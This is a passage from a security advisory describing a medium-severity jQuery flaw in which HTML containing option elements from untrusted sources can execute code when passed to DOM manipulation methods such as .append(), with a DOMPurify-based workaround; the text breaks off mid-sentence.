CVSS v3.x: 6.9 (Medium)
- >= 4.4.0
Passing HTML containing
<option> elements from untrusted sources - even after
sanitizing them - to one of jQuery’s DOM manipulation methods (i.e.
.append(), and others) may execute untrusted code.
To workaround this issue without upgrading, use DOMPurify with its
SAFE_FOR_JQUERY option to sanitize the HTML string before passing it to a